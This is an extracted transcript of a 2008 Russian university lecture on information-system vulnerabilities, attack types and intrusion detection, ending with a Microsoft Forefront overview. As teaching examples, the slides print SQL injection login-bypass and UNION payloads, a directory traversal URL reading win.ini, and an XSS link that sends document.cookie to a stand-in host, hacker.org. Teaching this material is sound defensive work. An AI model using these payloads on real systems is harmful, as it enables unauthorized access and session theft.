Уязвимость

Download Report

Transcript Уязвимость 

Технологии и продукты
Microsoft в обеспечении ИБ
Лекция 16. Анализ защищённости информационной системы на
основе выявления уязвимостей и обнаружения вторжений
Цели
 Изучить классификацию уязвимостей,




информационных атак и их возможных последствий.
Рассмотреть различные типы технологических и
эксплуатационных уязвимостей программноаппаратного обеспечения АС.
Изучить основные способы реализации
информационных атак.
Научиться отличать сетевые и хостовые системы
анализа защищённости.
Познакомиться с методами сбора и анализа
информации, реализуемые в системах анализа
защищённости.
2
Высшая школа экономики - 2008
Уязвимость - «ахиллесова пята»
информационных систем
3
Высшая школа экономики - 2008
От чего защищать?
4
Высшая школа экономики - 2008
Типы уязвимостей
 Технологические уязвимости



Уязвимость типа «переполнение буфера»
Уязвимость типа «SQL Injection»
Уязвимость типа «format string»
 Эксплуатационные уязвимости



Неправильная настройка сетевых сервисов АС
Использование слабых и нестойких к угадыванию
паролей доступа
Отсутствие установленных модулей обновления
программного обеспечения (Service Packs,
HotFixes, и т.д.)
5
Высшая школа экономики - 2008
Классификация уязвимостей АС
Уязвимости автоматизированных систем
По типу уязвим ости
Уязвимос ть в программноаппаратном обе спечении АС
Уязвимос ть в организационноправовом обеспечении АС
По типу обеспечения АС, в котором содержится уязв имость
Уязвимость апп аратного
обеспечения
Уязвимость общесистемного
программного обеспечения
Уязвимость прикладного
п рограммного обеспечения
По типу компонента АС, в котором содержатся уязвимость
Уязвимость рабочи х
станций АС
Уязви мость
с ерверов АС
Уязвимос ть коммун икационн ого
оборудования и каналов связи АС
По этапу ж изненного цикла АС, на котором внедряется уязвимость
Уяз вимость
эксплуатацион ного этапа
Уяз вимость
техн ологического этапа
По степени преднамеренности внесённой уязвимости АС
Уязви мости, вн есённ ые
н епреднамеренным п утём
Уязвимости, внесённые
преднамеренн ым п утём
По уровню модели сетевого взаимодействия, на котором присутствует уязвимость
Уяз вимость
фи зического уровня
Уязви мость
канального уровня
6
Уяз вимость
сетевого уровня
Уязвимость транспортного уровня
Уязви мость прикладного уровня
Высшая школа экономики - 2008
Технологическая уязвимость типа
«переполнение буфера»
7
Высшая школа экономики - 2008
Источники уязвимостей типа
«buffer overflow»
 программы, которые запускаются локально
на хосте
 сетевые приложения, которые
обеспечивают интерактивное
взаимодействие с пользователем на основе
сетевых протоколов. Примером сетевых
программ являются Web-приложения, такие
как CGI-модули, PHP-сценарии, активные
серверные страницы ASP и др.
 хранимые процедуры серверов СУБД
8
Высшая школа экономики - 2008
Технологическая уязвимость
«SQL Injection»
 Уязвимости типа «SQL Injection» («инъекция в
SQL-запросы») позволяют нарушителю
выполнять несанкционированные операции
над содержимым баз данных SQL-серверов
путём вставки дополнительных команд в SQLзапросы
 Уязвимость «SQL Injection» заключается в
отсутствии проверки корректности данных,
поступающих на вход программе, что
потенциально может позволить нарушителю
составить входные данные таким образом, что
приведёт к искажению искомого SQL-запроса к
СУБД
9
Высшая школа экономики - 2008
Активизация уязвимости «SQL
Injection» с целью получения НСД
SQLQuery = "SELECT Username FROM Users WHERE Username = '" &
strUsername & "' AND Password = '" & strPassword & "'"
strAuthCheck = GetQueryResult(SQLQuery)
If strAuthCheck = "" Then
boolAuthenticated = False
Else
boolAuthenticated = True
End If
«SELECT Username FROM Users WHERE Username = ''
OR ''='' AND Password = '' OR ''=''»
(полужирным шрифтом выделены команды, которые
внедряются нарушителем в исходный SQL-запрос).
10
Высшая школа экономики - 2008
Активизация уязвимости «SQL
Injection» с целью извлечения данных
SQLString = "SELECT FirstName, LastName
FROM Employees WHERE City = '" & strCity
& "'«
SELECT FirstName, LastName FROM Employees
WHERE City =
'' UNION ALL SELECT OtherField FROM
OtherTable WHERE ''=''
11
Высшая школа экономики - 2008
Технологическая уязвимость
«Directory traversal»
Уязвимости типа «Directory traversal»
(«просмотр директорий») могут позволить
злоумышленнику получить
несанкционированный доступ к файловым
ресурсам сервера в обход установленных
правил разграничения доступа
«http://192.168.0.1/getnews.asp?item=
../../../../WINNT/win.ini»
12
Высшая школа экономики - 2008
Технологическая уязвимость
«Cross Site Scripting»
Уязвимости типа «Cross Site Scripting»
(«межсайтовое выполнение сценариев»)
характерны для серверных Webприложений, не предусматривающих
проверку синтаксиса входных данных, на
основе которых формируются HTMLдокументы, отправляемые пользователям
«<A HREF="http:// www.server.ru/ShowError.asp?
error_text= <script>document.location.
replace('http://hacker.org/steal.cgi?+document.cookie')
;</script>">Link Text </A>»
13
Высшая школа экономики - 2008
Уязвимости реализаций стека TCP/IP
Уязвимости реализаций стека TCP/IP
связаны с ошибками, которые допускаются
программистами на этапе реализации
программных модулей, отвечающих за
обработку входящих хост
и исходящих пакетов
данных
Пример уязвимости данного типа – атака
«Land»
14
Высшая школа экономики - 2008
Жизненный цикл атаки
15
Высшая школа экономики - 2008
Типы информационных атак
16
Высшая школа экономики - 2008
Инструментальный анализ защищенности
Для чего предназначен:
• Инвентаризация ресурсов сети (устройства, ОС,
службы, ПО)
• Идентификация и анализ технологических уязвимостей
• Подготовка отчетов, описание проблем и методов
устранения
Типы используемых для анализа средств:
• Сетевые сканеры безопасности
• Хостовые сканеры безопасности (проверка ОС и
приложений)
• Утилиты удаленного администрирования
• Утилиты для верификации найденных уязвимостей
• Утилиты для инвентаризации ресурсов
17
Высшая школа экономики - 2008
Сбор информации
 Сетевые датчики предназначены для сбора
информации о пакетах данных,
передаваемых в том сегменте ИС, где
установлен датчик
 Хостовые датчики устанавливаются на
определённые компьютеры в ИС и
предназначаются для сбора информации о
событиях, возникающих на этих компьютерах
18
Высшая школа экономики - 2008
Анализ информации
 Сигнатурные методы описывают каждую
атаку в виде специальной модели или
сигнатуры. В качестве сигнатуры атаки могут
выступать:
 строка символов
 семантическое выражение на специальном языке
 формальная математическая модель и т.д.
 Поведенческие методы отслеживают
несоответствия между текущим режимом
функционирования ИС и моделью штатного
режима работы, заложенной в параметрах
метода
19
Высшая школа экономики - 2008
Microsoft Forefront
 Всесторонняя защита бизнесприложений, позволяющая достичь
лучшей защиты и безопасного доступа
посредством глубокой интеграции и
упрощенного управления
Защита клиентской
и серверной ОС
Защита серверных
приложений
20
Защита периметра
Высшая школа экономики - 2008
Система предотвращения вторжений
 Forefront Network Inspection System (NIS)
 Сигнатуры, основанные на уязвимостях
 Основана на GAPA от Microsoft Research
• Generic Application Level Protocol Analyzer
 Платформа для быстрого низкоуровневого
сканирования
 Расширяема
 Security assessment and response (SAS)
 Моделирование, основанное на поведении
21
Высшая школа экономики - 2008
Система предотвращения вторжений
 Основанная на сигнатурах
 Определяет и противостоит атакам из интернета,
основанным на уязвимостях
 Определяет и предупреждает о «внутренних»
компьютерах, которые ведут атаки
 Основанная на анализе поведения
 «Найди то, не знаю что»
 Отслеживает поведение систем и определяет
потенциально зловредные компоненты сети
 Может противодействовать угрозе на основании
политики
22
Высшая школа экономики - 2008
Использованные источники
 Сердюк В.А. Уязвимость - «Ахиллесова пята»
современных информационных систем
«BYTE/Россия», 2004, №4 (68), стр. 19-22.
 Сердюк В.А. Вы атакованы – защищайтесь
(методология выявления атак) //
«BYTE/Россия», 2003, №9 (61), стр. 61-64
 Сердюк В.А. Новое в защите от взлома
корпоративных систем. Техносфера; 2007.
 Калихман Р. Forefront Client Security: технический
обзор // Microsoft, слайды. Опубликовано:
https://msdb.ru/Downloads/f/d5214ed0-b831-4e27b85c-ad61a700ea45/1_FCS_overview.pdf
23
Высшая школа экономики - 2008
Спасибо за внимание!